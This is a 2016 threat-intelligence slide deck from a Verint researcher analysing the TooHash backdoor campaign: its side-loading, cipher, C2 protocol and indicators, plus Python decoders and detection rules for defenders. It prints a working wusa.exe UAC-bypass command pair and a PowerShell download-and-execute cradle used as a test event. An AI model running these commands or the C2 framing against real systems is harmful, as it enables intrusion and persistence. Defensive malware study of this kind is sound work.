An Intelligence-Driven Approach to Cyber Defense
Peikan Tsung (PK), Chief Cyber Researcher, Verint Systems (Taiwan)

Table of Contents
• Traditional Cyber Security
• Low Visibility of Cyber Threats
  • Fileless Malware Attacks
  • Bypass Signature Check
• Operation TooHash (H2) Evolution
• Indicator to Intelligence
• From Cyber Security to Cyber Defense

File to Fileless. Abnormal to Normal. Malicious to Neutral.

TRADITIONAL STATIC SECURITY APPROACHES AND ARCHITECTURES BASED ON SECURITY CONTROLS, PREVENTATIVE TECHNOLOGIES AND PERIODIC STRATEGY REVIEWS ARE NOW OUTDATED

© 2016 Verint Systems Inc. All rights reserved worldwide.

Traditional Cyber Security (1/5)
[Screenshot: privilege management and File Guard controls on host WIN-ICR1F40XXXX]

Traditional Cyber Security (2/5)
[Screenshot: privilege management, NG-Firewall and File Guard on host WIN-ICR1F40XXXX]

Traditional Cyber Security (3/5)
[Screenshot: privilege management, NG-Firewall and File Guard]

Traditional Cyber Security (4/5)
[Screenshot: privilege management]

Traditional Cyber Security (5/5)
[Screenshot: SIEM dashboard; traffic to Google Drive and Dropbox flagged "Abnormality Detected"]

Low Visibility of Cyber Threats
• Invisible attacks: VPN, AD, Pass-the-Hash (PtH), Pass-the-Ticket (PtT)
• Invisible network traffic: Google Drive, Dropbox
• Invisible malware: Task Scheduler, WMI, PowerShell

Fileless Malware Attacks
• Script-based and fileless malware is increasing dramatically. PowerShell can be embedded in a macro and carried inside a document file in many forms.
• PowerShell and WMI are both built into Windows and are routinely used for post-exploitation, so fileless threats will keep growing.
• A single elegant line of PowerShell achieves three things:
  • Detect the architecture (check the size of the IntPtr type: 4 bytes on x86, 8 bytes on x64).
  • Download a binary from a web site.
  • Run the downloaded code on the fly with iex.
• Invoke-Expression (iex) runs commands or expressions on the local computer. A backdoor can be installed with one PowerShell line.

Import Self-Signed Certificate to Bypass Signature Check
• The malicious program is self-signed, but the attacker added its certificate to the trusted root store, so on the victim the signature always verifies as valid.
• The check a defender wants here is therefore not the signature but the root store: a self-signed root that Microsoft never shipped (compare the local root store against the Microsoft certificate trust list or a known-good baseline) is the indicator.

TooHash (H2) Evolution
TARGETED CYBER ATTACK ON COMPANIES AND ORGANIZATIONS

[Screenshot: emergency notification dated Mon Apr 11 18:29:59 CST 2016 from the Taiwan National CERT (https://spm.nat.gov.tw/ALTRP), asking all government agencies to check by April 25 (ROC year 105) whether they are infected with a specific backdoor]

[Screenshot: VirusTotal report, analysis date 2016-03-31 16:08:26 UTC, detection ratio 17/56]
• Ad-Aware: Trojan.Generic.16214082
• Antiy-AVL: Trojan[Dropper]/Win32.Agent
• Arcabit: Trojan.Generic.DF76842
• Avast: Win32:Malware-gen
• Avira: TR/Agent.41984, TR/Agent.yiny
• BitDefender: Trojan.Generic.16214082
• DrWeb: Trojan.MulDrop6.16228
• ESET-NOD32: a variant of Win32/Agent.XSL
• Emsisoft: Trojan.Generic.16214082 (B)
Sample_NICT.rar Overview
• TMPolicy (2).dll pretends to be msisip.dll
• PDB path: F:\MyProject\msisip\Release\NvSmartMax.pdb
• The DLL entry point and every exported API do only one thing: WinExec("tmpolicy.dll", 0)
• TMPolicy (1).dll: original name tmpolicy.dll. It is actually a PE executable (tmpolicy.dll), not a library.

TMPolicy Sample Overview
• The malware determines whether it is running on 32-bit or 64-bit Windows and generates a different DLL payload for each to bypass the security check.
  • On Windows XP it drops srvlic.dll + the "fake" file
  • On Windows 7 it drops msTracer.dll + the "fake" file
• The "fake" file is the real backdoor module and is usually dropped to C:\Documents and Settings\All Users\Application Data\Windows CE\
• C2 connections: help.adobeservice.net:80, help.adobeservice.net:8080, assist.adobeservice.net:443, assist.adobeservice.net:1863

Running on x86 Windows XP
• How does C:\WINDOWS\system32\srvlic.dll get executed?
• One svchost.exe instance loads srvsvc.dll, and srvsvc.dll tries to load srvlic.dll when LoadLicensingLibrary() is called.
• C:\Windows\system32\srvlic.dll does not exist on a clean system, so the planted srvlic.dll is picked up through DLL side-loading / search-order hijacking.
• When srvlic.dll is loaded it reads the file "fake" and decrypts it into a module.
• The decrypted module is copied into a freshly allocated memory block rather than loaded through the loader, so the backdoor never appears in Process Explorer's DLL list (only the small srvlic.dll stub does).
[Screenshots: the decrypted DLL mapped into memory blocks]

Running on x64 Windows 7 (1/2)
• Run TMPolicy.exe:
  1. Drop C:\ProgramData\temp0 and move it to C:\Users\\AppData\Local\Temp\msTracer.dll
  2. Move C:\Users\\AppData\Local\Temp\msTracer.dll to C:\Windows\system32 (in theory this cannot be done directly, because UAC restricts writes to this path)
  3. When msTracer.dll is loaded it reads the file "fake" (C:\ProgramData\Windows CE\fake) and decrypts it into a module
  4. Create a batch file to delete all the dropped files

Running on x64 Windows 7 (2/2)
• SearchIndexer.exe is the Windows Search service (WSearch). When loadTracerDLL is called it tries to load msfte.dll and, if that fails, msTracer.dll.
• SearchProtocolHost.exe has the same DLL side-loading weakness.
• When msTracer.dll is loaded it reads the file "fake" and decrypts it into a module.

Bypass UAC on Windows 7 (1/3)
• TMPolicy.exe cannot move msTracer.dll into system32, because that directory is protected by UAC.
• So how does it place files in a system-protected area without triggering a UAC prompt?
• Reference: https://github.com/hfiref0x/UACME

Bypass UAC on Windows 7 (2/3)
• makecab.exe /V1 "C:\Users\\AppData\Local\Temp\msTracer.dll" "C:\Users\\AppData\Local\Temp\msTracer.dll.msu"
• wusa.exe /quiet "C:\Users\\AppData\Local\Temp\msTracer.dll.msu" /extract:C:\Windows\system32

Bypass UAC on Windows 7 (3/3)
• wusa.exe is the Windows Update Standalone Installer, a Microsoft-signed binary that auto-elevates; its /extract switch unpacks any .msu (a cabinet file) into a protected directory without a prompt.
• The wusa method, tweaked, works from Windows 7 up to Windows 10 TH1 build 10136; later Windows 10 builds removed the /extract switch.

Encryption/Decryption of fake (1/4)
• Each run of TMPolicy.exe generates a different fake file, but after decryption the contents are all the same.
• fake file content = 4-byte secret key + encrypted content
• The secret key is generated with rand().
• Because the key is stored in the clear at offset 0, anyone holding the file can decrypt it; the per-run randomness only defeats hash matching of the dropped file, not analysis.
Encryption/Decryption of fake (2/4)
• Secret key: the first 4 bytes
• Cipher = ENCRYPT(Plain, Secret_Key)
• Plain = DECRYPT(Cipher, Secret_Key)
• Reduced sequence: a 128-byte table

reduced_sequence = [
    0x03, 0x05, 0x06, 0x07, 0x0A, 0x0C, 0x0E, 0x13, 0x14, 0x18, 0x1B, 0x1C, 0x21, 0x25, 0x26, 0x27,
    0x28, 0x29, 0x2B, 0x2D, 0x2F, 0x30, 0x33, 0x35, 0x36, 0x37, 0x38, 0x3F, 0x41, 0x42, 0x45, 0x47,
    0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x50, 0x52, 0x53, 0x55, 0x56, 0x57, 0x5A, 0x5B, 0x5D, 0x5E, 0x60,
    0x61, 0x65, 0x66, 0x67, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x70, 0x73, 0x77, 0x7D, 0x7E, 0x7F,
    0x82, 0x83, 0x84, 0x8A, 0x8E, 0x91, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x9A, 0x9B, 0x9C, 0xA0,
    0xA1, 0xA3, 0xA4, 0xA6, 0xA7, 0xAA, 0xAB, 0xAC, 0xAE, 0xAF, 0xB1, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7,
    0xBA, 0xBC, 0xBF, 0xC0, 0xC2, 0xC9, 0xCA, 0xCB, 0xCC, 0xCE, 0xD1, 0xD2, 0xD4, 0xD6, 0xD8, 0xD9,
    0xDA, 0xDB, 0xDC, 0xE0, 0xE5, 0xE6, 0xE9, 0xED, 0xEE, 0xF3, 0xF5, 0xF7, 0xFA, 0xFB, 0xFC, 0xFE,
]

Encryption/Decryption of fake (3/4)
1. Calculate the chosen sequence (4 bytes): chosen_sequence[i] = reduced_sequence[secret_key[i] % 128]
2. Build the first secret map (256 bytes): first_secret_map = [0, 1, 2, ..., 255]
3. Rearrange first_secret_map four times, once with each of chosen_sequence[0] .. chosen_sequence[3]
4. Build the second secret map (256 bytes): second_secret_map[first_secret_map[i]] = i

Encryption/Decryption of fake (4/4)
• Encryption is a byte substitution through second_secret_map:
  encrypted_data[i] = second_secret_map[original_data[i]]
• Decryption substitutes back through the reversed map:
  reversed_second_secret_map[second_secret_map[i]] = i
  decrypted_data[i] = reversed_second_secret_map[encrypted_data[i]]
• This is a monoalphabetic substitution keyed by four bytes that are each taken mod 128, so the effective key space is only 128^4 = 2^28; and since the key is stored in the clear no brute force is needed at all. Even without the key, the known PE header bytes ("MZ", "This program cannot be run in DOS mode") recover most of the map directly.

Connection Protocol between fake and the C2 Server (1/3)
• C2 sends a command to fake:
  SIZE[4] | SECRET_KEY[4] | MAGIC[4] | OPCODE1[4] | OPCODE2[4] | PAYLOAD
  SIZE = total size of the command - 4; MAGIC, OPCODE1, OPCODE2 and PAYLOAD are encrypted with SECRET_KEY
• fake sends a response back to C2:
  SIZE[4] | SECRET_KEY[4] | MAGIC[4] | PAYLOAD
  SIZE = total size of the response - 4; MAGIC and PAYLOAD are encrypted with SECRET_KEY

Connection Protocol between fake and the C2 Server (2/3)
• If opcode1 == 0x3254BFD2 and opcode2 == 0x6FF39717 -> ExecCmd_LoadLibrary
  Command:  SIZE[4] | SECRET_KEY[4] | MAGIC[4] | 0x3254BFD2 | 0x6FF39717 | NAME_LEN[4] | NAME[NAME_LEN*2]
  Response: SIZE[4] | SECRET_KEY[4] | MAGIC[4] | MESSAGE_LEN[4] | MESSAGE[MESSAGE_LEN*2] | RETCODE[1]

Connection Protocol between fake and the C2 Server (3/3)
• If opcode1 == 0x22836D73 and opcode2 == 0x6F42E3C0 -> ExecCmd_GetPlatformBits
  Command:  SIZE[4] | SECRET_KEY[4] | MAGIC[4] | 0x22836D73 | 0x6F42E3C0
  Response: SIZE[4] | SECRET_KEY[4] | MAGIC[4] | MESSAGE_LEN[4] | MESSAGE[MESSAGE_LEN*2]
  MESSAGE is the UTF-16LE string "x86" (78 00 38 00 36 00) or "x64" (78 00 36 00 34 00), so MESSAGE_LEN = 3 and the string occupies 6 bytes.
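As an added example (not code from the deck or from the TooHash sample), the following Python reconstructs slides 25 to 33 end to end: the keyed substitution cipher that protects the fake file, and the SIZE / SECRET_KEY / MAGIC framing of the C2 protocol with the two documented opcode pairs. The 128-byte table and the opcodes are the deck's. Everything the deck leaves unstated is an assumption and is marked as such in the code: how first_secret_map is "rearranged" (a left rotation stands in for it), the MAGIC value, little-endian field order, and what MESSAGE and RETCODE mean for ExecCmd_LoadLibrary.

```python
"""TooHash 'fake' substitution cipher and the C2 framing built on it (reconstruction)."""
import os
import struct

# 128-byte reduced sequence, copied from slide 27.
REDUCED_SEQUENCE = bytes([
    0x03, 0x05, 0x06, 0x07, 0x0A, 0x0C, 0x0E, 0x13, 0x14, 0x18, 0x1B, 0x1C, 0x21, 0x25, 0x26, 0x27,
    0x28, 0x29, 0x2B, 0x2D, 0x2F, 0x30, 0x33, 0x35, 0x36, 0x37, 0x38, 0x3F, 0x41, 0x42, 0x45, 0x47,
    0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x50, 0x52, 0x53, 0x55, 0x56, 0x57, 0x5A, 0x5B, 0x5D, 0x5E, 0x60,
    0x61, 0x65, 0x66, 0x67, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x70, 0x73, 0x77, 0x7D, 0x7E, 0x7F,
    0x82, 0x83, 0x84, 0x8A, 0x8E, 0x91, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x9A, 0x9B, 0x9C, 0xA0,
    0xA1, 0xA3, 0xA4, 0xA6, 0xA7, 0xAA, 0xAB, 0xAC, 0xAE, 0xAF, 0xB1, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7,
    0xBA, 0xBC, 0xBF, 0xC0, 0xC2, 0xC9, 0xCA, 0xCB, 0xCC, 0xCE, 0xD1, 0xD2, 0xD4, 0xD6, 0xD8, 0xD9,
    0xDA, 0xDB, 0xDC, 0xE0, 0xE5, 0xE6, 0xE9, 0xED, 0xEE, 0xF3, 0xF5, 0xF7, 0xFA, 0xFB, 0xFC, 0xFE,
])

MAGIC = b"\xff\xff\xff\xff"   # ASSUMPTION: the real 4-byte MAGIC is not legible on the slide
LE32 = "<I"                   # ASSUMPTION: little-endian fields, as native on x86
OP_LOADLIBRARY = (0x3254BFD2, 0x6FF39717)       # opcode1, opcode2 from slide 31
OP_GETPLATFORMBITS = (0x22836D73, 0x6F42E3C0)   # opcode1, opcode2 from slide 32


def _rearrange(table, amount):
    """ASSUMPTION: the deck says first_secret_map is 'rearranged four times' with the
    chosen bytes but not how; a left rotation stands in here. Any bijection works."""
    amount %= len(table)
    return table[amount:] + table[:amount]

def build_maps(secret_key):
    """Derive (second_secret_map, reversed_second_secret_map) from a 4-byte key."""
    chosen = [REDUCED_SEQUENCE[secret_key[i] % 128] for i in range(4)]
    first = list(range(256))                 # first_secret_map = [0, 1, ..., 255]
    for c in chosen:
        first = _rearrange(first, c)
    second = [0] * 256                       # second_secret_map[first[i]] = i
    for i, v in enumerate(first):
        second[v] = i
    reverse = [0] * 256                      # reversed_second_secret_map[second[i]] = i
    for i, v in enumerate(second):
        reverse[v] = i
    return bytes(second), bytes(reverse)

def encrypt(plain, key):      # encrypted[i] = second_secret_map[plain[i]]
    return plain.translate(build_maps(key)[0])

def decrypt(cipher, key):     # decrypted[i] = reversed_second_secret_map[cipher[i]]
    return cipher.translate(build_maps(key)[1])

def pack_fake(module, key=None):
    """fake file = 4-byte secret key || substituted module (the dropper uses rand())."""
    key = key or os.urandom(4)
    return key + encrypt(module, key)

def unpack_fake(blob):
    """The key sits in the clear at offset 0, so no secret is needed to decode."""
    return decrypt(blob[4:], blob[:4])

def build_frame(fields, key=None):
    """SIZE[4] || SECRET_KEY[4] || ENCRYPT(MAGIC || fields, key); SIZE = total - 4."""
    key = key or os.urandom(4)
    body = MAGIC + fields
    return struct.pack(LE32, 4 + len(body)) + key + encrypt(body, key)

def open_frame(frame):
    """Check SIZE, decrypt with the per-frame key, verify MAGIC, return the fields."""
    (size,) = struct.unpack(LE32, frame[:4])
    if size + 4 != len(frame):
        raise ValueError("SIZE does not match frame length")
    body = decrypt(frame[8:], frame[4:8])
    if body[:4] != MAGIC:
        raise ValueError("bad MAGIC: wrong key or corrupt frame")
    return body[4:]

def build_command(opcodes, payload=b"", key=None):
    return build_frame(struct.pack("<II", *opcodes) + payload, key)

def utf16_field(text):
    """LEN[4] || UTF-16LE text; LEN counts characters, so the string is LEN*2 bytes."""
    return struct.pack(LE32, len(text)) + text.encode("utf-16-le")

def read_utf16_field(buf):
    (n,) = struct.unpack(LE32, buf[:4])
    return buf[4:4 + 2 * n].decode("utf-16-le"), buf[4 + 2 * n:]

def handle_command(frame, platform_bits=64):
    """Emulate the backdoor's dispatch for one command; returns (handler, response)."""
    body = open_frame(frame)
    opcodes, payload = struct.unpack("<II", body[:8]), body[8:]
    if opcodes == OP_GETPLATFORMBITS:
        msg = "x64" if platform_bits == 64 else "x86"   # MESSAGE_LEN = 3, UTF-16LE
        return "ExecCmd_GetPlatformBits", build_frame(utf16_field(msg))
    if opcodes == OP_LOADLIBRARY:
        name, _ = read_utf16_field(payload)
        # ASSUMPTION: the backdoor loads NAME and reports MESSAGE + RETCODE[1]; this
        # emulation only echoes NAME and returns RETCODE 0 so nothing gets loaded.
        return "ExecCmd_LoadLibrary", build_frame(utf16_field(name) + b"\x00")
    raise ValueError("unknown opcode pair %08X/%08X" % opcodes)
```

unpack_fake needs nothing beyond the file itself, which is the practical consequence of the key being stored in the clear. For traffic, open_frame is the decoder: the MAGIC check is what tells you the per-frame key was read from the right offset, and the opcode pair that follows identifies the command. Once the real rearrangement step is lifted from the sample, only _rearrange changes.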
[Screenshot: file properties of C:\ProgramData\temp0, a hidden DLL (GUI subsystem) owned by BUILTIN\Administrators; MD5 fb4a0fdb2c0af5b80e1f52b1bc3a375a, size 75776 bytes, created 2015-11-05 21:49:26, last written 2015-11-18 23:27:59, PE timestamp 2014-12-11 09:11:11; alias C:\WINDOWS\SYSTEM32\MSTRACER.DLL]

[Graph: SearchIndexer.exe (PID 3600, observed 2016-10-26 20:34:47) flagged for code/DLL injection and resolving help.adobeservice.net, assist.adobeservice.net and update.adobeservice.net; related spear-phishing sample 22719ab1f830dfa27c598e71e8ae7e5 (.xls, CVE-2012-0158) and the embedded C2 string help.adobeservice.net:1863;help.adobeservice.net:8080;assist.adobeservice.net:443;assist.adobeservice.net:80]

Operation TooHash (H2)
• On 03/11/2014 G DATA SecurityLabs disclosed a spyware campaign named Operation TooHash: a targeted attack on companies and organizations, delivered by spear-phishing, whose aim is to steal sensitive information from the targets.
• Active from 2013 to 2014-01-06; samples:
  • 8d263d5dae035e3d97047171e1cbf841 (102年尾牙、103年春酒精緻菜單.xls, "year-end party menu for ROC year 102 and spring banquet for year 103")
  • 7251073c67db6421049ee2baf4f31b62 (李辉简历.doc, "Li Hui's résumé")
  • 2ec306ef507402037e9c1eeb81276152 (文件列表.xls, "file list")
  • 6b83319cf336179f2105999fe586242c (Wo.doc)
• C2: *.cnnic-micro.com, *.adobeservice.net, *.intarnetservice.com, etc.
Indicators of the New Operation TooHash
• Hash values: 650C58E995A471FA4BE6C49A32F7899B, 4DBD68D3741D46170D2585AAE4336B80
• IP addresses
• Domain names: help.adobeservice.net
• Network/host artifacts: encode/decode algorithm, strings, connection protocol, User-Agent
• Tools: TMPolicy.exe
• TTPs: spear-phishing e-mail; UAC bypass via wusa.exe; deployment through anti-virus; DLL side-loading

[Screenshot: MITRE ATT&CK Enterprise matrix (https://attack.mitre.org/) with its tactic columns Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Execution, Collection, Exfiltration and Command and Control; the techniques seen in this campaign, among them Bypass User Account Control, DLL Search Order Hijacking, Code Signing, DLL Injection and PowerShell, appear in the matrix]
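The TTPs listed above are the layer of the pyramid that is worth writing detections for. As an added example (not the deck's or Verint's code) the Python below turns four of them into rules and runs them over constructed Sysmon-style events: the PowerShell download-and-iex cradle with its IntPtr architecture probe (slide 11), the makecab + wusa /extract UAC bypass (slides 23 and 24), the phantom DLL loads by svchost.exe, SearchIndexer.exe and SearchProtocolHost.exe (slides 17 and 21), and the drop of the "fake" module under a "Windows CE" directory. The event records, the user name "victim" in the paths and the host example.invalid are constructed for the example; the DLL and process names are the deck's.

```python
"""Detections for the TooHash tradecraft, run over constructed Sysmon-style events."""
import re
from pathlib import PureWindowsPath

# Constructed events, not real telemetry; field names follow Sysmon's schema
# (event 1 = process create, 7 = image load, 11 = file create).
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": ("powershell -w hidden -c \"$a=[IntPtr]::Size*8; "
                     "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/'+$a)\"")},
    {"id": 1, "Image": r"C:\Windows\System32\makecab.exe", "ParentImage": r"C:\Users\victim\TMPolicy.exe",
     "CommandLine": r'makecab.exe /V1 "C:\Users\victim\AppData\Local\Temp\msTracer.dll" '
                    r'"C:\Users\victim\AppData\Local\Temp\msTracer.dll.msu"'},
    {"id": 1, "Image": r"C:\Windows\System32\wusa.exe", "ParentImage": r"C:\Users\victim\TMPolicy.exe",
     "CommandLine": r'wusa.exe /quiet "C:\Users\victim\AppData\Local\Temp\msTracer.dll.msu" '
                    r'/extract:C:\Windows\system32'},
    {"id": 7, "Image": r"C:\Windows\System32\SearchIndexer.exe",
     "ImageLoaded": r"C:\Windows\System32\msTracer.dll"},
    {"id": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\srvsvc.dll"},           # legitimate load, no hit
    {"id": 11, "Image": r"C:\Users\victim\TMPolicy.exe",
     "TargetFilename": r"C:\ProgramData\Windows CE\fake"},
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell Get-Process"},  # benign
]

PHANTOM_DLLS = {"srvlic.dll", "mstracer.dll", "msfte.dll"}            # names from the deck
SIDELOAD_HOSTS = {"svchost.exe", "searchindexer.exe", "searchprotocolhost.exe"}
DOWNLOAD = re.compile(r"downloadstring|downloadfile|net\.webclient", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
ARCH_PROBE = re.compile(r"\[IntPtr\]::Size", re.I)
WUSA_EXTRACT = re.compile(r'/extract:\s*"?[a-z]:\\windows\\', re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def detect(event):
    """Return the list of rule names that fire on one event."""
    hits = []
    if event["id"] == 1:
        cmd, image = event.get("CommandLine", ""), basename(event["Image"])
        if image in ("powershell.exe", "pwsh.exe") and DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            hits.append("powershell_download_cradle")
            if ARCH_PROBE.search(cmd):          # the x86/x64 probe from slide 11
                hits.append("powershell_arch_probe")
        if image == "makecab.exe" and re.search(r"\.msu\b", cmd, re.I):
            hits.append("makecab_msu_staging")  # only Microsoft builds real .msu packages
        if image == "wusa.exe" and WUSA_EXTRACT.search(cmd):
            hits.append("wusa_extract_uac_bypass")
    elif event["id"] == 7:
        if basename(event["Image"]) in SIDELOAD_HOSTS and basename(event["ImageLoaded"]) in PHANTOM_DLLS:
            hits.append("phantom_dll_sideload")  # a DLL that should not exist got loaded
    elif event["id"] == 11:
        if "\\windows ce\\" in event["TargetFilename"].lower():
            hits.append("toohash_fake_module_drop")
    return hits


def scan(events):
    """Run every rule over every event; returns [(event index, rule name), ...]."""
    return [(i, rule) for i, e in enumerate(events) for rule in detect(e)]


if __name__ == "__main__":
    for i, rule in scan(EVENTS):
        ev = EVENTS[i]
        print(f"event {i}: {rule}  <- {ev.get('CommandLine') or ev.get('ImageLoaded') or ev.get('TargetFilename')}")
```

Two caveats when deploying rules like these. The wusa.exe /extract switch no longer exists on current Windows 10, so the UAC-bypass rule only matters for the Windows 7 and 8 hosts the deck targets; and the phantom-DLL rule assumes msfte.dll, srvlic.dll and msTracer.dll are absent from a clean system32, which is exactly why seeing them loaded is the signal: baseline your image-load telemetry first, then alert on any load of those names.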
[Screenshot: ATT&CK Groups page (https://attack.mitre.org/) listing APT1 (Comment Crew, Comment Group, Comment Panda; attributed to PLA GSD 3rd Department Unit 61398), APT12 (IXESHE, DynCalc, Numbered Panda; attributed to China), APT16 (China-based, spear-phishing campaigns against Japanese and Taiwanese organizations), APT17 (Deputy Dog; intrusions against U.S. government entities, the defense industry, law firms, IT companies, mining companies and NGOs) and APT18 (TG-0416, Dynamite Panda; active since at least 2009 against technology, manufacturing, human-rights, government and medical targets)]

Data -> Intelligence

Pyramid of Pain (http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html), from top to bottom; the higher the layer, the more it costs the attacker to change:
• TTPs: Tough! (strategic)
• Tools: Challenging
• Network/Host Artifacts: Annoying (tactical)
• Domain Names: Simple
• IP Addresses: Easy (operational)
• Hash Values: Trivial

[Slide 39 repeats the Taiwan National CERT emergency notification of Mon Apr 11 18:29:59 CST 2016 and the VirusTotal results shown earlier]
[Screenshot: Chinese-language advisory on the 2016 Taiwan ATM (Wincor) malware incident, listing the attacker's tools cnginfo.exe, cngdisp.exe, cngdisp_new.exe, delete.exe and cleanup.bat (the batch file removes cngdisp.exe and cnginfo.exe)]

Machine-Readable Threat Intelligence
• Intelligence providers: open-source threat intelligence (OSINT), commercial intelligence, Computer Emergency Response Teams (CERT), and closed threat intelligence from the organization itself
• Sources split into those able to generate IOCs and those not able to generate IOCs

Evolving From Cyber Security to Cyber Defense: From Being Hunted to Being Hunters
[Timeline, left to right:]
• Perimeter: policy enforcement
• Signature-based: compliance; limited to one attack vector
• SIEM: single pane of glass; aggregates logs, no analysis
• Advanced Threat Detection: threat visibility; only "knowns"
• SIEM 2.0: connect logs with network and endpoint; detect "unknowns"
• Advanced Threat Defense: integration, analytics and automation; needs automated analytics

ATTACKERS HAVE MULTIPLE ROUTES TO REACH THEIR TARGET: Organizations Need to Look Across the Kill Chain

The Need for a Unified and Automated Cyber Intelligence Solution
• Too many point products, each focused on a single attack vector: $70 billion spent on IT security, yet over 80% of organizations breached
• Too many alerts: 17,000 malware alerts a week, of which only 19% are considered reliable; only 4% of alerts are investigated
• Not enough solid insights: the shortage of cyber analysts is expected to reach 1.5M; teams cannot make sense of the noise, and investigations take days to weeks
Sources: Cybersecurity Ventures, Cybersecurity Market Report, December 2015; Ponemon Institute, Cost of Malware Containment, January 2015

[Diagram: automated detection and investigation funnel reducing a flood of raw events to a few incidents] Verint makes sense of the data to glean insights for superior cyber intelligence.

Automated & Orchestrated Cyber Intelligence
• Comprehensive = active + passive monitoring
• Multiple dimensions = network + endpoint forensics + file analysis
• Automated analysis = intelligence-oriented analysis + machine learning
• Visualization = unified investigation platform

Thank You for Listening